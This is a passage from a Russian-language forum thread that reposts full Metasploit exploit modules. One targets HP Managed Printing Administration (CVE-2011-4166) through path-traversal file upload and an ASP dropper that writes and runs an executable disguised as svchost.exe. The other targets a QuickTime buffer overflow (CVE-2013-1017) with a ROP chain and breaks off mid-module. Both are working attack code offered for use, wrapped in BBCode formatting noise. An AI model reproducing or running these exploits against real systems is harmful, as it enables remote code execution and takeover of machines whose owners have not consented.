В этой теме нет ответов

[DarckSol]

Download_WindowsVersion

Download_LinuxVersion

В этом топике будут публиковаться сплоиты и модули для этого продукта.

HP Managed Printing Administration jobAcct Remote Command Execution

[code]require 'msf/core'
[color=#000000][font=monospace][size=3]
class Metasploit3 < Msf::Exploit::Remote[/size][/font][/color][color=#000000][font=monospace][size=3]
Rank = ExcellentRanking[/size][/font][/color]
[color=#000000][font=monospace][size=3]
include Msf::Exploit::Remote::HttpClient[/size][/font][/color][color=#000000][font=monospace][size=3]
include Msf::Exploit::EXE[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def initialize[/size][/font][/color][color=#000000][font=monospace][size=3]
	super([/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Name'	 => 'HP Managed Printing Administration jobAcct Remote Command Execution',[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Description' => %q{[/size][/font][/color][color=#000000][font=monospace][size=3]
		This module exploits an arbitrary file upload vulnerability on HP Managed Printing[/size][/font][/color][color=#000000][font=monospace][size=3]
		Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles()[/size][/font][/color][color=#000000][font=monospace][size=3]
		function from the MPAUploader.Uploader.1 control, loaded and used by the server.[/size][/font][/color][color=#000000][font=monospace][size=3]
		The function can be abused via directory traversal and null byte injection in order[/size][/font][/color][color=#000000][font=monospace][size=3]
		to achieve arbitrary file upload. In order to exploit successfully, a few conditions[/size][/font][/color][color=#000000][font=monospace][size=3]
		must be met: 1) A writable location under the context of Internet Guest Account[/size][/font][/color][color=#000000][font=monospace][size=3]
		(IUSR_*), or Everyone is required. By default, this module will attempt to write to[/size][/font][/color][color=#000000][font=monospace][size=3]
		/hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide[/size][/font][/color][color=#000000][font=monospace][size=3]
		another writable path. 2) The writable path must also be readable by a browser,[/size][/font][/color][color=#000000][font=monospace][size=3]
		this typically means a location under wwwroot. 3) You cannot overwrite a file with[/size][/font][/color][color=#000000][font=monospace][size=3]
		the same name as the payload.[/size][/font][/color][color=#000000][font=monospace][size=3]
	 },[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Author'	 => [[/size][/font][/color][color=#000000][font=monospace][size=3]
		'Andrea Micalizzi', # aka rgod - Vulnerability Discovery[/size][/font][/color][color=#000000][font=monospace][size=3]
		'juan vazquez' # Metasploit module[/size][/font][/color][color=#000000][font=monospace][size=3]
	 ],[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Platform' => 'win',[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'References' =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		[[/size][/font][/color][color=#000000][font=monospace][size=3]
		 ['CVE', '2011-4166'],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 ['OSVDB', '78015'],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 ['BID', '51174'],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 ['URL', '[url="http://www.zerodayinitiative.com/advisories/ZDI-11-352/"]http://www.zerodayin...onospace[size=3]
		 ['URL', '[url="https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469"]https://h20566.www2....onospace[size=3]
		],[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Targets'	 =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		[[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],[/size][/font][/color][color=#000000][font=monospace][size=3]
		],[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'DefaultTarget' => 0,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Privileged'	 => false,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'DisclosureDate' => 'Dec 21 2011'[/size][/font][/color][color=#000000][font=monospace][size=3]
	)[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	register_options([/size][/font][/color][color=#000000][font=monospace][size=3]
	 [[/size][/font][/color][color=#000000][font=monospace][size=3]
		OptString.new('WRITEWEBFOLDER', [ false, "Additional Web location with file write permissions for IUSR_*" ])[/size][/font][/color][color=#000000][font=monospace][size=3]
	 ], self.class)[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def peer[/size][/font][/color][color=#000000][font=monospace][size=3]
	return "#{rhost}:#{rport}"[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def webfolder_uri[/size][/font][/color][color=#000000][font=monospace][size=3]
	begin[/size][/font][/color][color=#000000][font=monospace][size=3]
	 u = datastore['WRITEWEBFOLDER'][/size][/font][/color][color=#000000][font=monospace][size=3]
	 u = "/" if u.nil? or u.empty?[/size][/font][/color][color=#000000][font=monospace][size=3]
	 URI(u).to_s[/size][/font][/color][color=#000000][font=monospace][size=3]
	rescue ::URI::InvalidURIError[/size][/font][/color][color=#000000][font=monospace][size=3]
	 print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return "/"[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def to_exe_asp(exes = '')[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	var_func = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_stream = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_obj	 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_shell = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	var_f64name = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_length = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_out	 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_group	 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_bytes	 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_counter = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_char	 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_thisdata = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	const_base64 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_ngroup = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	var_pout	 = Rex::Text.rand_text_alpha(rand(8)+8)[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	vbs = "<%\r\n"[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	# ASP Base64 decode from Antonin Foller [url="http://www.motobit.com/tips/detpg_base64/"]http://www.motobit.c...onospace[size=3]
	vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_length} = Len(#{arg_b64string})\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Exit Function\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "End If\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_bytes} = 3\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_ngroup} = 0\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "For #{var_counter} = 0 To 3\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "If #{var_char} = \"=\" Then\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_thisdata} = 0\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Else\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "End If\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "If #{var_thisdata} = -1 Then\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Exit Function\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "End If\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Next\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Next\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_f64name} = #{var_out}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "End Function\r\n"[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	vbs << "Sub #{var_func}()\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_obj}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_stream}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_tempdir}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_tempexe}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_basedir}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_stream}.Write #{var_bytes}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "#{var_stream}.Close\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Dim #{var_shell}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "End Sub\r\n"[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	vbs << "#{var_func}\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs << "%>\r\n"[/size][/font][/color][color=#000000][font=monospace][size=3]
	vbs[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def upload(contents, location)[/size][/font][/color][color=#000000][font=monospace][size=3]
	post_data = Rex::MIME::Message.new[/size][/font][/color][color=#000000][font=monospace][size=3]
	post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")[/size][/font][/color][color=#000000][font=monospace][size=3]
	post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")[/size][/font][/color][color=#000000][font=monospace][size=3]
	data = post_data.to_s[/size][/font][/color][color=#000000][font=monospace][size=3]
	data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	res = send_request_cgi({[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'uri'	 => normalize_uri("hpmpa", "jobAcct", "Default.asp"),[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'method' => 'POST',[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'data'	 => data,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'encode_params' => false,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'vars_get' => {[/size][/font][/color][color=#000000][font=monospace][size=3]
		'userId' => rand_text_numeric(2+rand(2)),[/size][/font][/color][color=#000000][font=monospace][size=3]
		'jobId' => rand_text_numeric(2+rand(2))[/size][/font][/color][color=#000000][font=monospace][size=3]
		}[/size][/font][/color][color=#000000][font=monospace][size=3]
	 })[/size][/font][/color][color=#000000][font=monospace][size=3]
	return res[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def check[/size][/font][/color][color=#000000][font=monospace][size=3]
	res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})[/size][/font][/color][color=#000000][font=monospace][size=3]
	version = nil[/size][/font][/color][color=#000000][font=monospace][size=3]
	if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/[/size][/font][/color][color=#000000][font=monospace][size=3]
	 version = $1[/size][/font][/color][color=#000000][font=monospace][size=3]
	else[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return Exploit::CheckCode::Safe[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	vprint_status("HP MPA Version Detected: #{version}")[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	if version <= "2.6.3"[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return Exploit::CheckCode::Appears[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	return Exploit::CheckCode::Safe[/size][/font][/color]
[color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def exploit[/size][/font][/color][color=#000000][font=monospace][size=3]
	# Generate the ASP containing the EXE containing the payload[/size][/font][/color][color=#000000][font=monospace][size=3]
	exe = generate_payload_exe[/size][/font][/color][color=#000000][font=monospace][size=3]
	# Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains[/size][/font][/color][color=#000000][font=monospace][size=3]
	asp = to_exe_asp(exe)[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	#[/size][/font][/color][color=#000000][font=monospace][size=3]
	# UPLOAD[/size][/font][/color][color=#000000][font=monospace][size=3]
	#[/size][/font][/color][color=#000000][font=monospace][size=3]
	asp_name = "#{rand_text_alpha(5+rand(3))}.asp"[/size][/font][/color][color=#000000][font=monospace][size=3]
	locations = [[/size][/font][/color][color=#000000][font=monospace][size=3]
	 "/hpmpa/userfiles/images/printers/",[/size][/font][/color][color=#000000][font=monospace][size=3]
	 "/hpmpa/userfiles/images/backgrounds/",[/size][/font][/color][color=#000000][font=monospace][size=3]
	 "/hpmpa/userfiles/images/",[/size][/font][/color][color=#000000][font=monospace][size=3]
	 "/hpmpa/userfiles/",[/size][/font][/color][color=#000000][font=monospace][size=3]
	 "/"[/size][/font][/color][color=#000000][font=monospace][size=3]
	][/size][/font][/color]
[color=#000000][font=monospace][size=3]
	locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER'][/size][/font][/color]
[color=#000000][font=monospace][size=3]
	payload_url = ""[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	locations.each {|location|[/size][/font][/color][color=#000000][font=monospace][size=3]
	 asp_location = location + asp_name[/size][/font][/color][color=#000000][font=monospace][size=3]
	 print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 res = upload(asp, asp_location)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/[/size][/font][/color][color=#000000][font=monospace][size=3]
		print_good("#{peer} - ASP Payload successfully wrote to #{location}")[/size][/font][/color][color=#000000][font=monospace][size=3]
		payload_url = asp_location[/size][/font][/color][color=#000000][font=monospace][size=3]
		break[/size][/font][/color][color=#000000][font=monospace][size=3]
	 elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/[/size][/font][/color][color=#000000][font=monospace][size=3]
		print_error("#{peer} - Error probably due to permissions while writing to #{location}")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 else[/size][/font][/color][color=#000000][font=monospace][size=3]
		print_error("#{peer} - Unknown error while while writing to #{location}")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 end[/size][/font][/color][color=#000000][font=monospace][size=3]
	}[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	if payload_url.empty?[/size][/font][/color][color=#000000][font=monospace][size=3]
	 fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	#[/size][/font][/color][color=#000000][font=monospace][size=3]
	# EXECUTE[/size][/font][/color][color=#000000][font=monospace][size=3]
	#[/size][/font][/color][color=#000000][font=monospace][size=3]
	print_status("#{peer} - Executing payload through #{payload_url}...")[/size][/font][/color][color=#000000][font=monospace][size=3]
	send_request_cgi({ 'uri' => payload_url})[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]

[color=#000000][font=monospace][size=1]end[/size][/font][/color][/code]

Apple Quicktime 7 Invalid Atom Length Buffer Overflow Vulnerability

[code][color=#008200][font=monospace][size=1]##[/size][/font][/color][color=#000000][font=monospace][size=3]
# This file is part of the Metasploit Framework and may be subject to[/size][/font][/color][color=#000000][font=monospace][size=3]
# redistribution and commercial restrictions. Please see the Metasploit[/size][/font][/color][color=#000000][font=monospace][size=3]
# Framework web site for more information on licensing and terms of use.[/size][/font][/color][color=#000000][font=monospace][size=3]
# [url="http://metasploit.com/framework/"]http://metasploit.co...onospace[size=3]
##[/size][/font][/color]
[color=#000000][font=monospace][size=3]
require 'msf/core'[/size][/font][/color]
[color=#000000][font=monospace][size=3]
class Metasploit4 < Msf::Exploit::Remote[/size][/font][/color][color=#000000][font=monospace][size=3]
Rank = NormalRanking[/size][/font][/color]
[color=#000000][font=monospace][size=3]
include Msf::Exploit::Remote::HttpServer::HTML[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def initialize(info={})[/size][/font][/color][color=#000000][font=monospace][size=3]
	super(update_info(info,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Name'		 => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Description' => %q{[/size][/font][/color][color=#000000][font=monospace][size=3]
		This module exploits a vulnerability found in Apple Quicktime. The flaw is[/size][/font][/color][color=#000000][font=monospace][size=3]
		triggered when Quicktime fails to properly handle the data length for certain[/size][/font][/color][color=#000000][font=monospace][size=3]
		atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer[/size][/font][/color][color=#000000][font=monospace][size=3]
		overflow by loading a specially crafted .mov file, and allows arbitrary[/size][/font][/color][color=#000000][font=monospace][size=3]
		code execution under the context of the user.[/size][/font][/color][color=#000000][font=monospace][size=3]
	 },[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'License'	 => MSF_LICENSE,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Author'		 =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		[[/size][/font][/color][color=#000000][font=monospace][size=3]
		 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor[/size][/font][/color][color=#000000][font=monospace][size=3]
		 'Tom Gallagher', # Original Discovery (overlapped)[/size][/font][/color][color=#000000][font=monospace][size=3]
		 'Paul Bates', # Original Discovery (overlapped)[/size][/font][/color][color=#000000][font=monospace][size=3]
		 'sinn3r'		 # Metasploit[/size][/font][/color][color=#000000][font=monospace][size=3]
		],[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'References'	 =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		[[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'CVE', '2013-1017' ],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'BID', '60097' ],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'URL', '[url="http://support.apple.com/kb/HT5770"]http://support.apple...kb/HT5770[/url]' ][/size][/font][/color][color=#000000][font=monospace][size=3]
		],[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Platform'	 => 'win',[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Targets'	 =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		[[/size][/font][/color][color=#000000][font=monospace][size=3]
		 # All of the following addresses are from Quicktime.qts[/size][/font][/color][color=#000000][font=monospace][size=3]
		 # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],[/size][/font][/color][color=#000000][font=monospace][size=3]
		 [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ][/size][/font][/color][color=#000000][font=monospace][size=3]
		],[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Payload'	 =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		{[/size][/font][/color][color=#000000][font=monospace][size=3]
		 'BadChars'	 => "\x00" # js_property_spray no like nilz[/size][/font][/color][color=#000000][font=monospace][size=3]
		},[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'DefaultOptions' =>[/size][/font][/color][color=#000000][font=monospace][size=3]
		{[/size][/font][/color][color=#000000][font=monospace][size=3]
		 'InitialAutoRunScript' => 'migrate -f'[/size][/font][/color][color=#000000][font=monospace][size=3]
		},[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'Privileged'	 => false,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 'DisclosureDate' => "May 22 2013"[/size][/font][/color][color=#000000][font=monospace][size=3]
	))[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def get_payload(t)[/size][/font][/color][color=#000000][font=monospace][size=3]
	p = ''[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	rop =[/size][/font][/color][color=#000000][font=monospace][size=3]
	[[/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c1e844, # POP EBP # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c1e844, # skip 4 bytes [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0xffffffff,[/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c127e5, # INC EBX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c127e5, # INC EBX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c4e0da, # POP EAX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c34fcd, # POP EAX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c3048a, # POP EDI # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c46efb, # POP ESI # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c2aacc, # JMP [EAX] [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c3b860, # POP EAX # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c12df9, # PUSHAD # RETN [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll][/size][/font][/color][color=#000000][font=monospace][size=3]
	].pack("V*")[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	p << rop[/size][/font][/color][color=#000000][font=monospace][size=3]
	p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500[/size][/font][/color][color=#000000][font=monospace][size=3]
	p << payload.encoded[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	p[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]

[color=#000000][font=monospace][size=3]
def targetable?(agent)[/size][/font][/color][color=#000000][font=monospace][size=3]
